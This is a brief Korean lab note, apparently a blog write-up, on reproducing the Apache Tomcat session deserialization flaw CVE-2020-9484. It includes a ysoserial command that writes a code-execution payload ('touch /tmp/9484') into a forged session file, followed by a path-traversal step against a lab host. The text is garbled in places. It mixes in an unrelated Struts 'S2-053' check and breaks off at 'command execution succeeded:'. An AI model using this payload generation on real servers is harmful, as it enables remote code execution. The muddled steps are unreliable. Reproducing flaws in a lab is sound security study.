
Kali 2.0으로 Apache Tomcat Session 역직렬화 코드 실행 취약점 재현
Kali 2.0으로 Apache Tomcat Session 역직렬화 코드 실행 취약점 CVE-2020-9484 재현
/yourtomcatdir/bin/startup.sh
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 "touch /tmp/9484" > /tmp/22222.session
먼저 S2-053에 접속하여 정상적으로 시작되었는지 확인합니다:
http://192.168.152.128:8080/s2-053/
다시 접속하여 패킷을 캡처하고, intruder로 경로 순회를 수행합니다


명령 실행 성공:
